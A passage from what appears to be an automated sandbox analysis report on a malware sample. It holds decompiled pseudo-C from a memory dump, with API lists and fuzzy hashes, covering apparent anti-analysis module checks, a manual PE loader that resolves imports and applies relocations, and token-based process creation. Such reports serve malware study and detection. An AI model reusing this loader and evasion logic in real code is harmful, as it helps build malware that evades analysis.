    							__eflags =  *_t134;
    							E00E64B00( *_t134,  *_t272);
    						} else {
    							__eflags = _t235;
    							if(_t235 != 0) {
    								L46:
    								__eflags = _t222;
    								if(_t222 != 0) {
    									_t162 =  *_t272;
    									__eflags =  *(_t162 + 4);
    									if( *(_t162 + 4) == 0) {
    										__eflags = _t235 - _t258;
    										if(_t235 <= _t258) {
    											goto L49;
    										}
    									}
    								}
    							} else {
    								__eflags = _t222 - 4;
    								if(_t222 == 4) {
    									goto L46;
    								}
    							}
    						}
    						asm("sbb edi, edi");
    						_t271 =  ~_t269 & 0x00000002;
    						__eflags = _t271;
    						return _t271;
    					} else {
    						__eflags = _t218 - 4;
    						if(_t218 == 4) {
    							goto L34;
    						} else {
    							_t173 =  *_t272;
    							__eflags =  *(_t173 + 4);
    							if( *(_t173 + 4) != 0) {
    								goto L34;
    							} else {
    								_t88 = _t272 + 0x5c; // 0x5fe85000
    								__eflags = _t254 -  *_t88;
    								if(_t254 !=  *_t88) {
    									goto L34;
    								} else {
    									return 1;
    								}
    							}
    						}
    					}
    				} else {
    					return 3;
    				}
    			}

    APIs
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: memcpy
    • String ID:
    • API String ID: 3510742995-0
    • Opcode ID: 6b99f785ef5bb432ba68396c877eb0d4086885f26b78ddb0bfc44904db9e768b
    • Instruction ID: 852423cefdac450bf7da0dc0ac94eb2cb18dfdf735c26509c21802526eed1e74
    • Opcode Fuzzy Hash: 6b99f785ef5bb432ba68396c877eb0d4086885f26b78ddb0bfc44904db9e768b
    • Instruction Fuzzy Hash: 40D11471640A009FCB24CF69E8D096ABBF1FF98388B24992DE98AD7741D771E944CB50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 70%
    			E00E54D6E(intOrPtr* __ecx, void* __edx, void* __fp0) {
    				char _v516;
    				char _v556;
    				char _v564;
    				char _v568;
    				char _v572;
    				char _v576;
    				intOrPtr _v580;
    				char _v588;
    				signed int _v596;
    				intOrPtr _v602;
    				intOrPtr _v604;
    				char _v608;
    				CHAR* _v612;
    				CHAR* _v616;
    				signed int _v620;
    				signed int _v624;
    				signed int _v628;
    				signed int _v632;
    				char _v636;
    				intOrPtr _t117;
    				signed int _t120;
    				CHAR* _t122;
    				intOrPtr _t123;
    				CHAR* _t125;
    				WCHAR* _t128;
    				intOrPtr _t131;
    				intOrPtr _t135;
    				WCHAR* _t136;
    				intOrPtr _t140;
    				WCHAR* _t141;
    				CHAR* _t142;
    				intOrPtr _t143;
    				intOrPtr _t148;
    				intOrPtr _t151;
    				WCHAR* _t152;
    				signed int _t157;
    				WCHAR* _t158;
    				intOrPtr _t161;
    				intOrPtr _t163;
    				intOrPtr _t164;
    				intOrPtr _t168;
    				signed int _t171;
    				signed int _t176;
    				WCHAR* _t180;
    				char _t181;
    				intOrPtr _t195;
    				intOrPtr _t206;
    				signed int _t210;
    				char _t215;
    				WCHAR* _t226;
    				intOrPtr _t230;
    				intOrPtr _t233;
    				WCHAR* _t234;
    				signed int _t235;
    				signed int _t242;
    				signed int _t244;
    				signed int _t245;
    				CHAR* _t246;
    				intOrPtr _t258;
    				intOrPtr _t266;
    				void* _t267;
    				void* _t269;
    				intOrPtr _t270;
    				void* _t276;
    				intOrPtr _t278;
    				void* _t295;
    				void* _t296;
    				intOrPtr _t302;
    				WCHAR* _t322;
    				CHAR* _t323;
    				void* _t325;
    				WCHAR* _t326;
    				intOrPtr _t328;
    				WCHAR* _t330;
    				signed int _t333;
    				intOrPtr* _t335;
    				void* _t354;
    
    				_t354 = __fp0;
    				_t335 = (_t333 & 0xfffffff8) - 0x26c;
    				_t117 =  *0xe6e688; // 0xe80000
    				_t242 = 0;
    				_t325 = __ecx;
    				_v620 = 0;
    				if(( *(_t117 + 0x1898) & 0x00000082) == 0) {
    					L8:
    					_t13 = E00E5B78E(0xe6b9c0,  &_v516) + 1; // 0x1
    					E00E5A853( &_v556, _t13, 0);
    					_t295 = 0x64;
    					_t120 = E00E5A457( &_v556, _t295);
    					 *0xe6e748 = _t120;
    					if(_t120 != 0) {
    						_push(0x4e5);
    						_t296 = 0x10;
    						 *0xe6e680 = E00E5E1C7(0xe6b9c4, _t296);
    						 *_t335 = 0x610;
    						_t122 = E00E595C7(0xe6b9c4);
    						_push(_t242);
    						_push(_t122);
    						_v612 = _t122;
    						_t123 =  *0xe6e688; // 0xe80000
    						_t125 = E00E592CB(_t123 + 0x228);
    						_t315 = _t125;
    						_v616 = _t125;
    						E00E585BB( &_v612);
    						_t128 = E00E5B24F(_t125);
    						__eflags = _t128;
    						if(_t128 != 0) {
    							_t234 = E00E58955(_t315, 1, _t242, _t242);
    							__eflags = _t234;
    							if(_t234 != 0) {
    								_t235 = E00E5A2C9(_t234);
    							} else {
    								_t235 = _t242;
    							}
    							 *((intOrPtr*)(_t325 + 0x10)) = _t235;
    							 *_t325 = 3;
    						}
    						E00E58600( &_v616, 0xfffffffe);
    						_t131 =  *0xe6e688; // 0xe80000
    						_t21 = _t131 + 0x114; // 0xe80114
    						E00E54A0C( *((intOrPtr*)( *((intOrPtr*)(_t131 + 0x110)))), _t21, _t354, _t325, _t242, _t242);
    						_t258 =  *0xe6e688; // 0xe80000
    						__eflags =  *((intOrPtr*)(_t258 + 0x101c)) - 3;
    						if( *((intOrPtr*)(_t258 + 0x101c)) == 3) {
    							L19:
    							asm("stosd");
    							asm("stosd");
    							asm("stosd");
    							asm("stosd");
    							asm("stosd");
    							_v572 = _t325;
    							_v576 =  *((intOrPtr*)(_t258 + 0x214));
    							_t135 =  *0xe6e680; // 0x0
    							_t136 =  *(_t135 + 8);
    							__eflags = _t136;
    							if(_t136 != 0) {
    								 *_t136(_t242, _t242, 1,  &_v568,  &_v564);
    							}
    							_v620 = _t242;
    							E00E5E2D1(_t354,  &_v576);
    							_pop(_t258);
    							_t140 =  *0xe6e6b4; // 0x510f870
    							_t141 =  *((intOrPtr*)(_t140 + 0x10))(_t242, _t242,  &_v620);
    							__eflags = _t141;
    							if(_t141 == 0) {
    								E00E5E2D1(_t354,  &_v588);
    								_t230 =  *0xe6e6b4; // 0x510f870
    								_pop(_t258);
    								 *((intOrPtr*)(_t230 + 0xc))(_v632);
    							}
    							__eflags =  *0xe6e73c;
    							if( *0xe6e73c <= 0) {
    								goto L37;
    							} else {
    								_t163 =  *0xe6e680; // 0x0
    								__eflags =  *((intOrPtr*)(_t163 + 8)) - _t242;
    								if( *((intOrPtr*)(_t163 + 8)) != _t242) {
    									_t226 =  *(_t163 + 0xc);
    									__eflags = _t226;
    									if(_t226 != 0) {
    										 *_t226(_v580);
    									}
    								}
    								_t164 =  *0xe6e688; // 0xe80000
    								_t258 =  *((intOrPtr*)(_t164 + 0x214));
    								__eflags = _t258 - 3;
    								if(_t258 == 3) {
    									goto L37;
    								} else {
    									__eflags =  *((intOrPtr*)(_t164 + 4)) - 6;
    									if( *((intOrPtr*)(_t164 + 4)) >= 6) {
    										__eflags =  *((intOrPtr*)(_t164 + 0x101c)) - 3;
    										if( *((intOrPtr*)(_t164 + 0x101c)) != 3) {
    											goto L37;
    										}
    										E00E549A6();
    										asm("stosd");
    										asm("stosd");
    										asm("stosd");
    										asm("stosd");
    										_t168 =  *0xe6e684; // 0x510f6c8
    										 *((intOrPtr*)(_t168 + 0xd8))( &_v608);
    										_t266 = _v602;
    										_t244 = 0x3c;
    										_t171 = _t266 + 0x00000002 & 0x0000ffff;
    										_v596 = _t171;
    										_v620 = _t171 / _t244 + _v604 & 0x0000ffff;
    										_t176 = _t266 + 0x0000000e & 0x0000ffff;
    										_v624 = _t176;
    										_v628 = _t176 / _t244 + _v604 & 0x0000ffff;
    										_t180 = E00E585EA(0x1000);
    										_v632 = _t180;
    										_pop(_t267);
    										__eflags = _t180;
    										if(_t180 != 0) {
    											_t181 = E00E5109A(_t267, 0x148);
    											_t302 =  *0xe6e688; // 0xe80000
    											_v636 = _t181;
    											_push(_t302 + 0x648);
    											_push(0xa);
    											_push(7);
    											_t269 = 2;
    											E00E59013(_t269,  &_v572);
    											_t270 =  *0xe6e688; // 0xe80000
    											_t330 = E00E560C5( &_v572, _t270 + 0x228, 1,  *((intOrPtr*)(_t270 + 0xa0)));
    											_v616 = _t330;
    											__eflags = _t330;
    											if(_t330 != 0) {
    												_push(_v624 % _t244 & 0x0000ffff);
    												_push(_v628 & 0x0000ffff);
    												_push(_v596 % _t244 & 0x0000ffff);
    												_push(_v620 & 0x0000ffff);
    												_push(_t330);
    												_push( &_v572);
    												_t195 =  *0xe6e688; // 0xe80000
    												__eflags = _t195 + 0x1020;
    												E00E59626(_v632, 0x1000, _v636, _t195 + 0x1020);
    												E00E585BB( &_v636);
    												E00E5A8F7(_v632, 0, 0xbb8, 1);
    												E00E58600( &_v616, 0xfffffffe);
    											}
    											E00E58600( &_v632, 0xfffffffe);
    										}
    										goto L42;
    									}
    									__eflags = _t258 - 2;
    									if(_t258 != 2) {
    										goto L37;
    									}
    									E00E549A6();
    									asm("stosd");
    									asm("stosd");
    									asm("stosd");
    									asm("stosd");
    									_t206 =  *0xe6e684; // 0x510f6c8
    									 *((intOrPtr*)(_t206 + 0xd8))( &_v608);
    									_t210 = _v602 + 0x00000002 & 0x0000ffff;
    									_v628 = _t210;
    									_t245 = 0x3c;
    									_v632 = _t210 / _t245 + _v604 & 0x0000ffff;
    									_t322 = E00E585EA(0x1000);
    									_v624 = _t322;
    									_pop(_t276);
    									__eflags = _t322;
    									if(_t322 != 0) {
    										_t215 = E00E595C7(_t276, 0x32d);
    										_t278 =  *0xe6e688; // 0xe80000
    										_push(_t278 + 0x228);
    										_push(_v628 % _t245 & 0x0000ffff);
    										_v636 = _t215;
    										E00E59626(_t322, 0x1000, _t215, _v632 & 0x0000ffff);
    										E00E585BB( &_v636);
    										E00E5A8F7(_t322, 0, 0xbb8, 1);
    										E00E58600( &_v624, 0xfffffffe);
    									}
    									goto L42;
    								}
    							}
    						} else {
    							_t233 =  *((intOrPtr*)(_t258 + 0x214));
    							__eflags = _t233 - 3;
    							if(_t233 == 3) {
    								goto L19;
    							}
    							__eflags =  *((intOrPtr*)(_t258 + 4)) - 6;
    							if( *((intOrPtr*)(_t258 + 4)) >= 6) {
    								L37:
    								_t142 = E00E595C7(_t258, 0x610);
    								_push(_t242);
    								_push(_t142);
    								_v616 = _t142;
    								_t143 =  *0xe6e688; // 0xe80000
    								_t326 = E00E592CB(_t143 + 0x228);
    								_v612 = _t326;
    								__eflags = _t326;
    								if(_t326 != 0) {
    									_t158 = E00E5B24F(_t326);
    									__eflags = _t158;
    									if(_t158 != 0) {
    										_t161 =  *0xe6e684; // 0x510f6c8
    										 *((intOrPtr*)(_t161 + 0x10c))(_t326);
    									}
    									E00E58600( &_v612, 0xfffffffe);
    								}
    								E00E585BB( &_v616);
    								_t148 =  *0xe6e688; // 0xe80000
    								lstrcpynW(_t148 + 0x438,  *0xe6e740, 0x20a);
    								_t151 =  *0xe6e688; // 0xe80000
    								_t152 = _t151 + 0x228;
    								__eflags = _t152;
    								lstrcpynW(_t152,  *0xe6e738, 0x20a);
    								_t328 =  *0xe6e688; // 0xe80000
    								_t115 = _t328 + 0x228; // 0xe80228
    								 *((intOrPtr*)(_t328 + 0x434)) = E00E58FA4(_t115, __eflags);
    								E00E58600(0xe6e740, 0xfffffffe);
    								E00E58600(0xe6e738, 0xfffffffe);
    								L42:
    								_t157 = 0;
    								__eflags = 0;
    								L43:
    								return _t157;
    							}
    							__eflags = _t233 - 2;
    							if(_t233 != 2) {
    								goto L37;
    							}
    							goto L19;
    						}
    					}
    					L9:
    					_t157 = _t120 | 0xffffffff;
    					goto L43;
    				}
    				_t246 = E00E595AD(0x6e2);
    				_v616 = _t246;
    				_t323 = E00E595AD(0x9f5);
    				_v612 = _t323;
    				if(_t246 == 0 || _t323 == 0) {
    					L7:
    					_t242 = 0;
    					goto L8;
    				} else {
    					if(GetModuleHandleA(_t246) != 0 || GetModuleHandleA(_t323) != 0) {
    						_v620 = 1;
    					}
    					E00E585A8( &_v616);
    					_t120 = E00E585A8( &_v612);
    					if(_v620 != 0) {
    						goto L9;
    					}
    					goto L7;
    				}
    			}

    APIs
    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00E54DC2
    • GetModuleHandleA.KERNEL32(00000000), ref: 00E54DC9
    • lstrcpynW.KERNEL32(00E7FBC8,0000020A,?,?,?,?,?,?,?,?,?,00000000), ref: 00E55257
    • lstrcpynW.KERNEL32(00E7FDD8,0000020A,?,?,?,?,?,?,?,?,?,00000000), ref: 00E5526B
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: HandleModulelstrcpyn
    • String ID:
    • API String ID: 3430401031-0
    • Opcode ID: e1b103a88b5c02150c3b960c072e6570931cd6fba9a26890a230ad0eb222a2c7
    • Instruction ID: 98385383d9174753e1cffbf0e69195cf030e0c02231af3a7d927b1f3c847766d
    • Opcode Fuzzy Hash: e1b103a88b5c02150c3b960c072e6570931cd6fba9a26890a230ad0eb222a2c7
    • Instruction Fuzzy Hash: 88E1D171504301AFE300EF65DC85AAB73E9AB98359F041D29F944F72E1EBB0D9498B62
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 52%
    			E00E62AF7(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
    				signed int _v5;
    				signed short _v12;
    				intOrPtr* _v16;
    				signed int* _v20;
    				intOrPtr _v24;
    				unsigned int _v28;
    				signed short* _v32;
    				struct HINSTANCE__* _v36;
    				intOrPtr* _v40;
    				signed short* _v44;
    				intOrPtr _v48;
    				unsigned int _v52;
    				intOrPtr _v56;
    				_Unknown_base(*)()* _v60;
    				signed int _v64;
    				intOrPtr _v68;
    				intOrPtr _v72;
    				unsigned int _v76;
    				intOrPtr _v80;
    				signed int _v84;
    				intOrPtr _v88;
    				signed int _t149;
    				void* _t189;
    				signed int _t194;
    				signed int _t196;
    				intOrPtr _t236;
    
    				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
    				_v24 = _v72;
    				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
    				_v56 = _t236;
    				if(_t236 == 0) {
    					L13:
    					while(0 != 0) {
    					}
    					_push(8);
    					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
    						L35:
    						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
    						while(0 != 0) {
    						}
    						if(_a12 != 0) {
    							 *_a12 = _v68;
    						}
    						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
    						return _v68(_a4, 1, _a8);
    					}
    					_v84 = 0x80000000;
    					_t149 = 8;
    					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
    					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
    						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
    						if(_v36 == 0) {
    							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
    						}
    						if(_v36 != 0) {
    							if( *_v16 == 0) {
    								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
    							} else {
    								_v20 =  *_v16 + _a4;
    							}
    							_v64 = _v64 & 0x00000000;
    							while( *_v20 != 0) {
    								if(( *_v20 & _v84) == 0) {
    									_v88 =  *_v20 + _a4;
    									_v60 = GetProcAddress(_v36, _v88 + 2);
    								} else {
    									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
    								}
    								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
    									 *_v20 = _v60;
    								} else {
    									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
    								}
    								_v20 =  &(_v20[1]);
    								_v64 = _v64 + 4;
    							}
    							_v16 = _v16 + 0x14;
    							continue;
    						} else {
    							_t189 = 0xfffffffd;
    							return _t189;
    						}
    					}
    					goto L35;
    				}
    				_t194 = 8;
    				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
    				_t196 = 8;
    				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
    				while(0 != 0) {
    				}
    				while(_v48 > 0) {
    					_v28 = _v44[2];
    					_v48 = _v48 - _v28;
    					_v28 = _v28 - 8;
    					_v28 = _v28 >> 1;
    					_v32 =  &(_v44[4]);
    					_v80 = _a4 +  *_v44;
    					_v52 = _v28;
    					while(1) {
    						_v76 = _v52;
    						_v52 = _v52 - 1;
    						if(_v76 == 0) {
    							break;
    						}
    						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
    						_v12 =  *_v32 & 0xfff;
    						_v40 = (_v12 & 0x0000ffff) + _v80;
    						if((_v5 & 0x000000ff) != 3) {
    							if((_v5 & 0x000000ff) == 0xa) {
    								 *_v40 =  *_v40 + _v56;
    							}
    						} else {
    							 *_v40 =  *_v40 + _v56;
    						}
    						_v32 =  &(_v32[1]);
    					}
    					_v44 = _v32;
    				}
    				goto L13;
    			}

    APIs
    • GetModuleHandleA.KERNEL32(?), ref: 00E62C57
    • LoadLibraryA.KERNEL32(?), ref: 00E62C70
    • GetProcAddress.KERNEL32(00000000,890CC483), ref: 00E62CCC
    • GetProcAddress.KERNEL32(00000000,?), ref: 00E62CEB
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: AddressProc$HandleLibraryLoadModule
    • String ID:
    • API String ID: 384173800-0
    • Opcode ID: 635f6114dc9bdecd5eb63fe3714de1019e18df0298e96c88539751b833f71931
    • Instruction ID: ce534796deb8cf1ca3da8778add680974069e0a34298ef78704e8e650b38d46e
    • Opcode Fuzzy Hash: 635f6114dc9bdecd5eb63fe3714de1019e18df0298e96c88539751b833f71931
    • Instruction Fuzzy Hash: 51A19B75A40209DFCB14CFA8D884AADBBF0FF08358F149559E915BB3A1D734AA81CF64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E00E51C68(signed int __ecx, void* __eflags, void* __fp0) {
    				char _v16;
    				intOrPtr _v20;
    				char _v24;
    				char _v28;
    				void* _t13;
    				intOrPtr _t15;
    				signed int _t16;
    				intOrPtr _t17;
    				signed int _t18;
    				char _t20;
    				intOrPtr _t22;
    				void* _t23;
    				void* _t24;
    				intOrPtr _t29;
    				intOrPtr _t35;
    				intOrPtr _t41;
    				intOrPtr _t43;
    				intOrPtr _t48;
    				void* _t51;
    				signed int _t61;
    				signed int _t64;
    				void* _t71;
    
    				_t71 = __fp0;
    				_t61 = __ecx;
    				_t41 =  *0xe6e6dc; // 0x0
    				_t13 = E00E5A4A5(_t41, 0);
    				while(_t13 < 0) {
    					E00E597F2( &_v28);
    					_t43 =  *0xe6e6e0; // 0x0
    					_t15 =  *0xe6e6e4; // 0x0
    					_t41 = _t43 + 0xe10;
    					asm("adc eax, ebx");
    					__eflags = _t15 - _v24;
    					if(__eflags > 0) {
    						L9:
    						_t16 = 0xfffffffe;
    						L13:
    						return _t16;
    					}
    					if(__eflags < 0) {
    						L4:
    						_t17 =  *0xe6e684; // 0x510f6c8
    						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0xe6e6d0, 0);
    						__eflags = _t18;
    						if(_t18 == 0) {
    							break;
    						}
    						_t35 =  *0xe6e684; // 0x510f6c8
    						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
    						_t41 =  *0xe6e6dc; // 0x0
    						__eflags = 0;
    						_t13 = E00E5A4A5(_t41, 0);
    						continue;
    					}
    					__eflags = _t41 - _v28;
    					if(_t41 >= _v28) {
    						goto L9;
    					}
    					goto L4;
    				}
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				_t20 =  *0xe6e6e8; // 0x0
    				_v28 = _t20;
    				_t22 = E00E5A68F(_t41, _t61,  &_v16);
    				_v20 = _t22;
    				if(_t22 != 0) {
    					_t23 = GetCurrentProcess();
    					_t24 = GetCurrentThread();
    					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0xe6e6d0, 0, 0, 2);
    					E00E597F2(0xe6e6e0);
    					_t64 = E00E51A1B( &_v28, E00E51226, _t71);
    					__eflags = _t64;
    					if(_t64 >= 0) {
    						_push(0);
    						_push( *0xe6e760);
    						_t51 = 0x27;
    						E00E59EEC(_t51);
    					}
    				} else {
    					_t64 = _t61 | 0xffffffff;
    				}
    				_t29 =  *0xe6e684; // 0x510f6c8
    				 *((intOrPtr*)(_t29 + 0x30))( *0xe6e6d0);
    				_t48 =  *0xe6e6dc; // 0x0
    				 *0xe6e6d0 = 0;
    				E00E5A4C1(_t48);
    				E00E58600( &_v24, 0);
    				_t16 = _t64;
    				goto L13;
    			}

    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 507b5e8bd49c62335b324b7a7aa34f7aac77377535aefcb507b954122acb39c1
    • Instruction ID: 5d16767ef64922fbfdb1f8cc7621f73be76d11a1bd1be0f16fe06c2ee19bd681
    • Opcode Fuzzy Hash: 507b5e8bd49c62335b324b7a7aa34f7aac77377535aefcb507b954122acb39c1
    • Instruction Fuzzy Hash: C631C4366082009FD304EF65FC8596B77E9EB543A2B141E6AF911F72E1DEA09C0C8752
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 73%
    			E00E51B2D(void* __eflags, void* __fp0) {
    				char _v24;
    				char _v28;
    				void* _t12;
    				intOrPtr _t14;
    				void* _t15;
    				intOrPtr _t16;
    				void* _t17;
    				void* _t19;
    				void* _t20;
    				char _t24;
    				intOrPtr _t26;
    				intOrPtr _t28;
    				intOrPtr _t33;
    				intOrPtr _t38;
    				intOrPtr _t40;
    				void* _t41;
    				intOrPtr _t46;
    				void* _t48;
    				intOrPtr _t51;
    				void* _t61;
    				void* _t71;
    
    				_t71 = __fp0;
    				_t38 =  *0xe6e6f4; // 0x0
    				_t12 = E00E5A4A5(_t38, 0);
    				while(_t12 < 0) {
    					E00E597F2( &_v28);
    					_t40 =  *0xe6e700; // 0x0
    					_t14 =  *0xe6e704; // 0x0
    					_t41 = _t40 + 0x3840;
    					asm("adc eax, ebx");
    					__eflags = _t14 - _v24;
    					if(__eflags > 0) {
    						L13:
    						_t15 = 0;
    					} else {
    						if(__eflags < 0) {
    							L4:
    							_t16 =  *0xe6e684; // 0x510f6c8
    							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0xe6e6ec, 0);
    							__eflags = _t17;
    							if(_t17 == 0) {
    								break;
    							} else {
    								_t33 =  *0xe6e684; // 0x510f6c8
    								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
    								_t51 =  *0xe6e6f4; // 0x0
    								__eflags = 0;
    								_t12 = E00E5A4A5(_t51, 0);
    								continue;
    							}
    						} else {
    							__eflags = _t41 - _v28;
    							if(_t41 >= _v28) {
    								goto L13;
    							} else {
    								goto L4;
    							}
    						}
    					}
    					L12:
    					return _t15;
    				}
    				E00E597F2(0xe6e700);
    				_t19 = GetCurrentProcess();
    				_t20 = GetCurrentThread();
    				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0xe6e6ec, 0, 0, 2);
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				_t24 =  *0xe6e6e8; // 0x0
    				_v28 = _t24;
    				_t61 = E00E51A1B( &_v28, E00E5131E, _t71);
    				if(_t61 >= 0) {
    					_push(0);
    					_push( *0xe6e760);
    					_t48 = 0x27;
    					E00E59EEC(_t48);
    				}
    				if(_v24 != 0) {
    					E00E56876( &_v24);
    				}
    				_t26 =  *0xe6e684; // 0x510f6c8
    				 *((intOrPtr*)(_t26 + 0x30))( *0xe6e6ec);
    				_t28 =  *0xe6e758; // 0x0
    				 *0xe6e6ec = 0;
    				_t29 =  !=  ? 1 : _t28;
    				_t46 =  *0xe6e6f4; // 0x0
    				 *0xe6e758 =  !=  ? 1 : _t28;
    				E00E5A4C1(_t46);
    				_t15 = _t61;
    				goto L12;
    			}

    APIs
    • GetCurrentProcess.KERNEL32(00E6E6EC,00000000,00000000,00000002), ref: 00E51BCC
    • GetCurrentThread.KERNEL32 ref: 00E51BCF
    • GetCurrentProcess.KERNEL32(00000000), ref: 00E51BD6
    • DuplicateHandle.KERNEL32(00000000), ref: 00E51BD9
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: Current$Process$DuplicateHandleThread
    • String ID:
    • API String ID: 3566409357-0
    • Opcode ID: c7d5bd4ea6af882d7fd1cdeaf13606858437f20bbad9184e4510c4cd738a0895
    • Instruction ID: c8acb7a8f4c48a2ff401bb5dd21e9cf0012c8bf787ec633b3c4b137cfbea5bd9
    • Opcode Fuzzy Hash: c7d5bd4ea6af882d7fd1cdeaf13606858437f20bbad9184e4510c4cd738a0895
    • Instruction Fuzzy Hash: 3D31A3796043119FD308DF66FD85A2B77E9EB54391B002D69F912B72E2DAB09C0CCB52
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 38%
    			E00E5AD2A(intOrPtr* __ecx, void* __edx, char _a4) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v32;
    				char* _v92;
    				void _v100;
    				intOrPtr* _t21;
    				intOrPtr* _t22;
    				intOrPtr* _t25;
    				int _t27;
    				intOrPtr _t28;
    				intOrPtr _t38;
    				intOrPtr _t47;
    				int _t58;
    				int _t60;
    
    				_t21 =  *0xe6e680; // 0x0
    				_t22 =  *_t21;
    				_t60 = 0;
    				if(_t22 != 0) {
    					_t1 =  &_v12; // 0xe54973
    					_push( *__ecx);
    					if( *_t22() != 0) {
    						_v8 = 0;
    						_t25 = E00E5B97E(1,  &_v8);
    						_v16 = _t25;
    						if(_t25 != 0) {
    							_push(__edx);
    							_push( *_t25);
    							_t28 =  *0xe6e68c; // 0x510f890
    							if( *((intOrPtr*)(_t28 + 0x68))() != 0) {
    								_v8 = 0;
    								asm("stosd");
    								asm("stosd");
    								asm("stosd");
    								asm("stosd");
    								_t58 = 0x44;
    								memset( &_v100, 0, _t58);
    								_v100 = _t58;
    								_v92 =  &_v8;
    								_push( &_v32);
    								_push( &_v100);
    								_t38 =  *0xe6e684; // 0x510f6c8
    								_push(0);
    								_push(0);
    								_push(0x4000000);
    								_push(0);
    								_push(0);
    								_push(0);
    								_t15 =  &_a4; // 0xe54973
    								_push( *_t15);
    								_push(0);
    								_push(_v12);
    								if( *((intOrPtr*)(_t38 + 0x50))() != 0) {
    									_t60 = 1;
    								}
    							}
    							E00E58600( &_v16, 0);
    						}
    						_t47 =  *0xe6e684; // 0x510f6c8
    						_t19 =  &_v12; // 0xe54973
    						 *((intOrPtr*)(_t47 + 0x30))( *_t19);
    						_t27 = _t60;
    						L10:
    						return _t27;
    					}
    					GetLastError();
    				}
    				_t27 = 0;
    				goto L10;
    			}

    APIs
    • GetLastError.KERNEL32 ref: 00E5AD57
      • Part of subcall function 00E5B97E: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,73BCF500,00000000,10000000,00000000,00000000,?,00E5BA1D,?,00000000,?,00E5D0B3), ref: 00E5B999
      • Part of subcall function 00E5B97E: GetLastError.KERNEL32(?,00E5BA1D,?,00000000,?,00E5D0B3), ref: 00E5B9A0
    • memset.MSVCRT ref: 00E5AD9E
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: ErrorLast$InformationTokenmemset
    • String ID: sI$sI
    • API String ID: 898169725-1970482550
    • Opcode ID: e10b12529985e756423a3371950996be21a73201d9575a8c8a04aa5c680d843e
    • Instruction ID: 201a40351f5d2388a34c77e9d0aecd90c3cfb03c550a18239fda911d645f3aa0
    • Opcode Fuzzy Hash: e10b12529985e756423a3371950996be21a73201d9575a8c8a04aa5c680d843e
    • Instruction Fuzzy Hash: EE216076A0010CBFEB009BA9DC84DAFB7BDEB88399B144579F901E7120E7709D099B61
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E00E5B78E(WCHAR* __ecx, void* __edx) {
    				signed int _v8;
    				long _v12;
    				char _v16;
    				short _v528;
    				char _v1040;
    				char _v1552;
    				intOrPtr _t23;
    				char _t27;
    				intOrPtr _t28;
    				signed int _t29;
    				void* _t33;
    				long _t38;
    				WCHAR* _t43;
    				WCHAR* _t56;
    
    				_t44 = __ecx;
    				_v8 = _v8 & 0x00000000;
    				_t43 = __edx;
    				_t56 = __ecx;
    				memset(__edx, 0, 0x100);
    				_v12 = 0x100;
    				_t23 =  *0xe6e684; // 0x510f6c8
    				 *((intOrPtr*)(_t23 + 0xb0))( &_v528,  &_v12);
    				lstrcpynW(_t43,  &_v528, 0x100);
    				_t27 = E00E595C7(_t44, 0xa88);
    				_v16 = _t27;
    				_t28 =  *0xe6e684; // 0x510f6c8
    				_t29 =  *((intOrPtr*)(_t28 + 0x68))(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
    				asm("sbb eax, eax");
    				_v8 = _v8 &  ~_t29;
    				E00E585BB( &_v16);
    				_t33 = E00E5C39D(_t43);
    				E00E59626( &(_t43[E00E5C39D(_t43)]), 0x100 - _t33, L"%u", _v8);
    				lstrcatW(_t43, _t56);
    				_t38 = E00E5C39D(_t43);
    				_v12 = _t38;
    				CharUpperBuffW(_t43, _t38);
